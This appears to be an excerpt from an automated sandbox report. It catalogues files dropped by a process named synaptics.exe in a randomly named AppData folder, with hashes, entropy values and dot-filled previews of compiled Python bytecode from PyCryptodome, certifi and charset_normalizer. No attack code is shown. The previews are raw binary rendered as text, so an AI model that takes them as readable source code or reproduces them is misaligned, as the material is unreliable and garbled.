                                                                                                                                                                                                            SHA-512:2AFFC0E04C45C7EEB4F5134415B8B910BF0F30520EDF38F2B4367F55CEDF1EC75A9C0FE1824607B5EBAAC11D952D68A7957B020176D5DFC3F627131AAB3C48BF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d...Z.d.S.)......Nc....................C...sd...|.d...d.k.r.t.d.....t.|.d.d.......|.g...}.t.j...t.j...t.....\.}.}.t.j...|.d...}.t.j.j.|.g.|...R...S.).a....Return the complete file name for the module.. dir_comps : list of string. The list of directory names in the PyCryptodome package.. The first element must be "Crypto"... filename : string. The filename (inclusing extension) in the target directory.. r....Z.Cryptoz)Only available for modules under 'Crypto'.....Nz...)...ValueError..list..os..path..split..abspath..__file__..join)...dir_comps..filenameZ.util_lib.._Z.root_lib..r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Util\_file_system.py..pycryptodome_filename"...s................r....).r....r....r....r....r....r......<module>....s........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8741
                                                                                                                                                                                                            Entropy (8bit):5.206987069752403
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mhLyEONC31/QtcU4/GPCenzp7Qb+RQrBIQIu7XNNHD0yXNvjB2IatSxB/dbJg1uw:mhuEONC31ItcUGGPCenzp7Qb+RQrBIQO
                                                                                                                                                                                                            MD5:D6922003DF349A00D747769A1F9CD1B7
                                                                                                                                                                                                            SHA1:13CAFDDD97F88E833D0C7050DBE633C1B3BB7F1E
                                                                                                                                                                                                            SHA-256:E3C27B3A0980A82A133BEF2BFC4E9AED02DC2B315ACBB3D8116AFEEFD2E570B4
                                                                                                                                                                                                            SHA-512:5C04A9C8236336693EB53CF6E8D2CAB1C9626C70E22AAD6A29FBE3B8D097D8C7AAE94F4A614EFE0E8872A7368C7508FA305CE68C4352E32A9C5D94C25ACB88C6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g}*.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.d...d.k.r:d.d.l.Z.g.Z.e.....D.].\.Z.Z.Z.e.e.j.k.r8e...e.....q)n.d.d.l.m.Z...e.j.Z.e.e.f.Z.G.d.d...d.e...Z.zkd.e.j.v.r_e.j.j.d.k.r_e.d.....e.j.d.k.rme.j.d.k.rme.d.....d.d.l.m.Z...e...Z.e.j Z!e.."e..#d.....Z$e..#d...j%j&Z'd.d...Z(d.d...Z)e)Z*e)Z+e)Z,d.d...Z-d;d.d...Z.d.d...Z/d.d...Z0d.d...Z1G.d.d ..d e...Z2d!d"..Z3d#Z4W.nt..e...y.......d.d.l5Z5d.d$l5m6Z6m7Z7m8Z8m)Z)m*Z*m-Z-m.Z.m,Z,m+Z+..d.d%l9m:Z:..d.d&l5m;Z'..d.Z!g.Z<d'd(..Z,d)d...Z(d*d...Z/d+d...Z0e5j=Z>d.Z?e5j@jAZBe5j@jCZDe5jEZFe5.Ge>..ZHG.d,d-..d-e5jI..ZJd.d...Z1G.d/d0..d0e...ZKd1d"..Z3d2Z4Y.n.w.G.d3d4..d4e...ZLd5d6..ZMd7d8..ZNd9d:..ZOd.S.)<.....N)...byte_string)...pycryptodome_filename.....)...machineryc....................@...s(...e.Z.d.Z.e.j.d.d.....Z.e.j.d.d.....Z.d.S.)..._VoidPointerc....................C........d.S.).z&Return the memory location we point toN......selfr....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-pack
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30886
                                                                                                                                                                                                            Entropy (8bit):5.223442247500147
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:lz1Enqf1DECvkHf9R3OPtm6q3YZHjSgfShUUEV6:lziCIRePYN3YZHeDzEV6
                                                                                                                                                                                                            MD5:54E947C5178759CFC688EADB9B20859E
                                                                                                                                                                                                            SHA1:51BE27D450C57CC66519C7DE29D322028CF5392B
                                                                                                                                                                                                            SHA-256:8B63B85780D78F65D61C043B1F3F7720538DF2402E8B15FA106F437719FC3E2B
                                                                                                                                                                                                            SHA-512:E1A6C3F232225763711A64CFD1E0B3C7483AB8685DAE599EC321687E18B20787960F02E80D904C816F74C60007E76721309F5884E3A4A9856F80D8BE923012E5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gq........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...g.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......N)...byte_string..bchr..bord)...long_to_bytes..bytes_to_long)...DerObject..DerInteger..DerBoolean..DerOctetString..DerNull..DerSequence..DerObjectId..DerBitString..DerSetOfFc....................C...s4...d.}.z.|.|...}.W.n...t.y.......Y.d.S.w.|...p.|.d.k.S.).Nr....F)...TypeError)...x..only_non_negative..test..r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Util\asn1.py.._is_number(...s..................r....c....................@...s@...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...BytesIO_EOFzeThis class differs from BytesIO in that a ValueError exception is. raised whenever EOF is reached.c....................C...s....|.|._.d.|._.d.|._.d.S...Nr....)..._buffer.._in
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61139
                                                                                                                                                                                                            Entropy (8bit):5.247357868444139
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sNhCN5FZjyUy0lwXEgNjOtg78YrIn6VhjlLQ5DR4wLDzwK2csHXV:sNQFpyUy0lsEgZOtg78sI6VTLQ5DRvv6
                                                                                                                                                                                                            MD5:CD1ABF54C5D049FBE6D3FA3CE2195A94
                                                                                                                                                                                                            SHA1:7689C1AE5AE8D69E13AD5FC4E5A76374C3721B60
                                                                                                                                                                                                            SHA-256:1B2B7397BDB6A05C8A57F082E85D52886A07BD1955F6648B81845A411EBAE8C6
                                                                                                                                                                                                            SHA-512:8AE7CF798B2451CF233DC8DB0110C583C4C2F50E4428F223A3746A97CA86D71A49CA0EF9EA3A789FC2A18EB9140C427ABE092316CD36D9ABEDEC18968650473D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gh~.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.d...Z.d.d...Z.d(d.d...Z.d(d.d...Z.d(d.d...Z.e.j.d.d.....d.k.r>e.j.Z.n.d.d...Z.e.j.d.d.....d.k.rPd.d...Z.n.d.d...Z.d(d.d...Z.d(d.d...Z.d)d.d...Z.d*d.d...Z.d.d.l.Z.d+d.d ..Z.d!d"..Z.d.d.l.Z.d+d#d$..Z.d%d&..Z.d'Z.d.S.),.....N)...Random)...iter_rangec....................C...sP...|.d.k.r.t.....|.d.k.s.|.d.k.r.t.d.....t.|.|...\.}.}.|.d.k.r&|.d.k.r&|.d.7.}.|.S.).zDReturn ceil(n/d), that is, the smallest integer r such that r*d >= nr....z.Non positive values.....)...ZeroDivisionError..ValueError..divmod)...n..d..r..q..r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Util\number.py..ceil_div%...s....................r....c....................C...s....|.d.k.r.t.d.....|.....S.).z)Returns the size of the number N in bits.r....z4Size in bits only available for non-negative numbers).r......bit_length)...Nr....r....r......size2...s..........r....c....................C...sZ...|.d.u
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5258
                                                                                                                                                                                                            Entropy (8bit):4.925897418511187
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:XcF/EpktYDLOjIWTmpSaRBF7mgcwi/e/7/9whOJZg+6B6cGZ2B+uWc7xUK6It:XW/EpkGUIW82HWzL0zJU+
                                                                                                                                                                                                            MD5:652EF0685C8364BDE2D69EE8DC213F2E
                                                                                                                                                                                                            SHA1:C4DA8BD0485B0E089B2502676E43543C99FEF60A
                                                                                                                                                                                                            SHA-256:0D20CAE049FEEC6E0D533DDF43DDCB8932DA135103A55BCB2C91232FC1AD0102
                                                                                                                                                                                                            SHA-512:7A07E90DD5AC299D5A1C037FA398B1C8E30C414F24AB94F4FA891438B2C7D25DB570110F1A0FC2B91094B5BA43C2FC6A8F8C10D38B7839BFDEAC21D0BFD02838
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gz........................@...sX...d.Z.d.d.l.Z.d.d.l.Z.e.j.d...d.k.r[d.d...Z.d.d...Z.d.d...Z.d.d...Z.d0d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.l.m.Z...e.Z.d.d.l.m.Z...e.Z.d.d...Z.d.d...Z.d.d...Z.e...d.e.f.d.d.i...Z.e.Z.nId d...Z.d!d...Z.d"d...Z.d#d...Z.d0d$d...Z.d%d...Z.d&d...Z.d'd...Z.d.d(l.m.Z...d.d.l.m.Z...d.d)l.m.Z...e.Z.d*d...Z.d+d...Z.d,d...Z.d.d-l.m.Z...e.Z.d.d/..Z.[.[.d.S.)1a....Compatibility code for handling string/bytes changes from Python 2.x to Py3k..In Python 2.x, strings (of type ''str'') contain binary data, including encoded.Unicode text (e.g. UTF-8). The separate type ''unicode'' holds Unicode text..Unicode literals are specified via the u'...' prefix. Indexing or slicing.either type always produces a string of the same type as the original..Data read from a file is always of '''str'' type...In Python 3.x, strings (type ''str'') may only contain Unicode text. The u'...'.prefix and the ''unicode'' type are now redundant. A new type (called.''bytes'') has to b
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3269
                                                                                                                                                                                                            Entropy (8bit):5.113077827176243
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:j4jdkxR/B0sI/LU/kwf+RDQ+XfxGsKrccFVQuWP/Z6mQaG8PR02B4Ho4Uw7sR:j4xkv/3WLJwyJfmrccFuz/Z6CG8G1hW
                                                                                                                                                                                                            MD5:B45420E06F0C50D587719709518F1B8A
                                                                                                                                                                                                            SHA1:E74A51CAB6235DF21EE4EFCC27EF09B42614C2A4
                                                                                                                                                                                                            SHA-256:8F3BA13797E043591E31F3CB2000225E90DF53C763CFF6BD7D944EA8E0C03150
                                                                                                                                                                                                            SHA-512:33D29AE1E9F35D131BC0C97EFB7790F63622F93442600AFF1AB0FAD3C151193910C03EE8763DFE341CE23C5E6387344D58A03D1FFB9EBAC3170C8A4EC8FC48CA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sJ...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_lib..c_size_t..create_string_buffer..get_raw_buffer..c_uint8_ptr..is_writeable_bufferz.Crypto.Util._strxoray.... void strxor(const uint8_t *in1,. const uint8_t *in2,. uint8_t *out, size_t len);. void strxor_c(const uint8_t *in,. uint8_t c,. uint8_t *out,. size_t len);. Nc....................C...s....t.|...t.|...k.r.t.d.....|.d.u.r.t.t.|.....}.n.|.}.t.|...s!t.d.....t.|...t.|...k.r1t.d.t.|.........t...t.|...t.|...t.|...t.t.|.........|.d.u.rKt.|...S.d.S.).a....From two byte strings of equal length,. create a third one which is the byte-by-byte XOR of the two... Args:. term1 (bytes/bytearray/memoryview):. Th
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):440
                                                                                                                                                                                                            Entropy (8bit):5.181092891619677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/GCYB21NXYvAL/tdxmAfTwAvrPllqGl/llYlekkvuPllfM+uwkn23h/a/ArMDPF:CGCY6ovkxNPll8kkU4Xfsnf9oyF
                                                                                                                                                                                                            MD5:D9CADB5C5D0A4B7B477125729E83E3AB
                                                                                                                                                                                                            SHA1:44F5EDCACC15087F49310D8890B6698326C176CA
                                                                                                                                                                                                            SHA-256:D2831091D3866274B10912835A654CDD9D5C88760A76DF4EB9F971F46DCAB924
                                                                                                                                                                                                            SHA-512:7422743FCCFEE2979BFF0331A48C153AF9BB7CD2FDC02A9CC96ABF4B52F5A5A649063B4125E81CBB5086A85232242E366E55B0504DD0C435150409A5BBB40EA5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s$...g.d...Z.d.Z.d...d.d...e.D.....Z.d.S.).).Z.CipherZ.Hash..ProtocolZ.PublicKeyZ.Util..Signature..IOZ.Math).............0...c....................C...s....g.|.].}.t.|.....q.S...)...str)....0..xr....r.....LC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\__init__.py..<listcomp>....s......r....N)...__all__..version_info..join..__version__r....r....r....r......<module>....s..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7576
                                                                                                                                                                                                            Entropy (8bit):5.079466903901472
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:OcgPE5vNnnqs8NYd7pqqx0H/8qq/xqqqRuLMJXHge3YbkqZPqqq3KqUCwqEMlkgM:GyvNnnqs+67pqqx0H/8qq/xqqqRuLMXC
                                                                                                                                                                                                            MD5:57DFBF68EF4EDD8334EB3EF0095D00DC
                                                                                                                                                                                                            SHA1:5FECAF0CA1EFFA3E84681D6CA2FD5B5AC00A1032
                                                                                                                                                                                                            SHA-256:FCCCFF09D2A989A5E1C5B2CBFB10E75C6D347DAF24F110E85D8F614F25229519
                                                                                                                                                                                                            SHA-512:070CA97243CC2B5ED120E9100282C2B4A53FD24E44C36D7B7A840962C2B77C59B843A06C65D810E5C72CBC7B25D0C9D62D92A4E0263CE6B09386CC953C1E2609
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......^..g.........................@...s....d.d.l.Z.d.d.l.Z.d.e.j.v.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.j.D.].Z.e.e.d.e.....e.j.....q2e...Z.d.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.S.)......NZ.__pypy__c....................C...s6...d.t.j.v.r.d.S.t.r.t.j.d.k.r.d.S.d.d.l.}.|...d.....d.S.).N..distutils)...........r....a....Distutils was imported before Setuptools, but importing Setuptools also replaces the `distutils` module in `sys.modules`. This may lead to undesirable behaviors or errors. To avoid these issues, avoid using distutils directly, ensure that setuptools is installed in the traditional way (e.g. not an editable install), and/or make sure that setuptools is always imported before distutils.)...sys..modules..is_pypy..version_info..warnings..warn).r......r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\_distutils_hack\__init__.py..warn_distutils_present....s....................r....c....................C...sF...d.t.j.v.r.d.S.d
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):283
                                                                                                                                                                                                            Entropy (8bit):5.1545025652500955
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/Y0eNbsZvEG/Xg6nCbWjN2oKuwkn23h/a/Arsq4G:CJeNQeGVN2oKpfsHq7
                                                                                                                                                                                                            MD5:5003B13C902269C0ECDDC0EFE200E642
                                                                                                                                                                                                            SHA1:4B27918F8EA3E2912279C006E0C7429FAE0A3EED
                                                                                                                                                                                                            SHA-256:0117F6D597E55710B9772DD55DF956E3FCEB606E08F4AFA7D6EFD866AFC910F5
                                                                                                                                                                                                            SHA-512:E330CB3DA11AA0865F698B3E7BBF9E34286F9462F4FDD7D58F434965E5A104A8E25BB62DA7CE0424B737CE8D5962126812650A346026DDFE851EC9F2C1E86CDD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g^........................@...s ...d.d.l.m.Z.m.Z...d.d.g.Z.d.Z.d.S.)......)...contents..wherer....r....z.2024.08.30N)...corer....r......__all__..__version__..r....r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\certifi\__init__.py..<module>....s..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2114
                                                                                                                                                                                                            Entropy (8bit):4.954236366948841
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:8BUoxmgDZLakqAl/g95K3Q8+epPUHq7J8nH:QUC/ocg955epA1H
                                                                                                                                                                                                            MD5:E73ADF472F6F144514B9054EFA052C48
                                                                                                                                                                                                            SHA1:9C8D3894B3D8F8BFB676D1F27360EA6CA7EB3774
                                                                                                                                                                                                            SHA-256:6D858B06DA57AAFD411F215F6988AC5AA709ABE39AD8DC53A1DAC234F4837B91
                                                                                                                                                                                                            SHA-512:01E1439C91B73DFA8112E0E8924AB8FE2CD2B6CDFCE6833005B97DCFAC47CA2D747911E7EC21C8154D7BF307FA7C23EFF6100F3290F8D6E8E5B858D07754F43F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gJ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.d...Z.e.j.d.k.r0d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.e.j.d.k.rQd.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.j.e.f...Z.e.e.d.f...Z.....d.d.e.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.).ze.certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents.......N..returnc....................C...s....t...d.d.d.....d.S.).N)..._CACERT_CTX..__exit__..r....r.....IC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\certifi\core.py..exit_cacert_ctx....s......r....)...........)...as_file..filesc....................C...s4...t.d.u.r.t.t.d.....d.....a.t.t.......a.t...t.....t.S...N..certifi..cacert.pem)..._CACERT_PATHr....r......joinpathr......str..__enter__..atexit..registerr....r....r....r....r......where....s..............r....c....................C...s....t.d.....d...j.d.d...S...Nr....r......ascii....encoding).r.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1579
                                                                                                                                                                                                            Entropy (8bit):5.723146470400134
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:04jbqjQtyat/c2vhCMhju/C/yv+K7qeUy:0WbqjQttwZ/C/yvvWeUy
                                                                                                                                                                                                            MD5:ADE62DABE3C84066BE5802D0BF7E0B24
                                                                                                                                                                                                            SHA1:C436F12D8879D9AE6DA3F4D31DD672267D35005B
                                                                                                                                                                                                            SHA-256:388B4976950E9EA84581CE83CB16DEDE552773FD8ABB39E1F55F5F17B6374211
                                                                                                                                                                                                            SHA-512:C726CF4F31A3F1417ACA87A535513F3C27049595B29167CE2758EDDCC2A8EEE584004F6C9D28159E0C8FFB816679A716CCE1EF577D6C47892F72DC308EE76C71
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gW........................@...sx...d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.e...d.....e.........d.S.).u.....Charset-Normalizer.~~~~~~~~~~~~~~.The Real First Universal Charset Detector..A library that helps you read text from an unknown charset encoding..Motivated by chardet, This package is trying to resolve the issue by taking a new approach..All IANA character set names for which the Python core library provides codecs are supported...Basic usage:. >>> from charset_normalizer import from_bytes. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')). >>> best_guess = results.best(). >>> str(best_guess). 'B.... ..... ... ..... .. ............ O............!'..Others methods and usages are available - see the full documentation.at <https://github.com/Ousret/charset_normalizer>..:copyright
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11708
                                                                                                                                                                                                            Entropy (8bit):5.8400460631249524
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:IWeJLv8V6fy4TM8eIGOD5vUD3MHz9ZZERkOBJzCTrFmYAr6aYohA0LfAgWSK57QI:IWeJLvc0TM8N630ZZa9zCvvm6GhA0Lfi
                                                                                                                                                                                                            MD5:C76166A72524F5D818AF73998AFF67D7
                                                                                                                                                                                                            SHA1:C6D6E6AB11614BC20A81E27F3EDE324C5DF3459C
                                                                                                                                                                                                            SHA-256:1FC59A7D464117E01363C9C53A1DECABA0BAEA71398F1487AB8958C76B1953D6
                                                                                                                                                                                                            SHA-512:B55CB0ABA32514DEE08875C88F96F8A309C7E58960CD52C558CCEE9B22B04645FEA826A71EDF09EFE2070546AA924C3EA505E0D2B1DFD8D0D266E54CD4588D55
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.Z.......................@...sL...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.. d...Z!e.."..Z#e#.$e..%d.........................d(d.e.e&e'f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d.d...Z,..................d(d.e.d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d d!..Z-..................d(d"e.e*e&e.f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d#d$..Z...................d)d%e.e.e*e.e&f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e+f.d&d'..Z/d.S.)*.....N)...PathLike)...BinaryIO..List..Optional..Set..Union.....)...coherence_ratio..encoding_languages..mb_encoding_languages..merge_coherence_ratios)...IANA_SUPPORTED..TOO_BIG_SEQUENCE..TOO_SMALL_SEQUENCE..TRACE)...mess_ratio)...CharsetMatch..CharsetMatches)...any_specified_encoding..cut_sequence_chunks..iana_name..identify_sig_or_bom..is_cp_similar..is_multi_b
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9657
                                                                                                                                                                                                            Entropy (8bit):5.517992906256985
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:+q53eApoIRl8if8rZ+IjfsmspqbQO0opPc7HPM4pOfXntTatDlA5u4ZBTWm:B57Tf8rkmypO0iPc7Hk4pOfXnQJlYuOB
                                                                                                                                                                                                            MD5:62009F5C08C73FB14418EFA0DA9508B2
                                                                                                                                                                                                            SHA1:5E958735319E38A8067FD71F2951A9D855F4600B
                                                                                                                                                                                                            SHA-256:8D1B10E86D9F81EB7CEC527B0B0A8E8403A7925B8157025AF3BDB3228F1DEE9A
                                                                                                                                                                                                            SHA-512:28B8212FCDFA88734F91BCA703165F0590CC10404A412BE78DA25A6D479A6B55F180E607D10E8830366FF348F785F38DF5CD2114F062FD6311C0CE64BF7A9F3B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.2.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.e.d.e.e...f.d.d...Z.d.e.d.e.e...f.d.d...Z.e...d.e.d.e.e...f.d.d.....Z e...d.e.d.e.e...f.d.d.....Z!e.e.d...d.e.d.e.e"e"f...f.d.d.....Z#..d0d.e.e...d.e"d.e.e...f.d.d...Z$d.e.d.e.e...d.e%f.d d!..Z&d"e.d.e.e...f.d#d$..Z'd%e.e...d.e.f.d&d'..Z(d%e.d.e.f.d(d)..Z)e.d*d.....d1d"e.d,e%d-e.e...d.e.f.d.d/....Z*d.S.)2.....N)...IncrementalDecoder)...Counter)...lru_cache).r......Dict..List..Optional..Tuple.....)...FREQUENCIES..KO_NAMES..LANGUAGE_SUPPORTED_COUNT..TOO_SMALL_SEQUENCE..ZH_NAMES).. is_suspiciously_successive_range)...CoherenceMatches)...is_accentuated..is_latin..is_multi_byte_encoding..is_unicode_range_secondary..unicode_range..iana_name..returnc........................s....t.|...r.t.d.....t...d...|.....j.}.|.d.d...}.i...d...t.d.d...D.]/}.|...t.|.g.....}.|.rNt.|...}.|.d.u.r4q.t.|...d.u.rN|...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30451
                                                                                                                                                                                                            Entropy (8bit):5.889725126383976
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:RvZKN0taqbKcwF7wuCDYAqHp2doD9VwypcDGVE6db45ufzR7C:RvZ6EKcR77YHDkypjU5uft7C
                                                                                                                                                                                                            MD5:DD126FF06A710456B92BEDC7191F3893
                                                                                                                                                                                                            SHA1:C9E94798A5FAEB60D161087A9286A121892B3068
                                                                                                                                                                                                            SHA-256:F5AA2B28A83B9FCF5E6FAC07B072D03B796018F70E266D95322E7F252A1F0E4E
                                                                                                                                                                                                            SHA-512:7528E64086CF5C98CDBB1FD5AF5EB50D05A1620EFFD75CF105ED2D98749FE1CE3F1C6E12866A12E07A674D21A16DCACE297F2BF3E04905EC7BFAA13C7798EEAA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
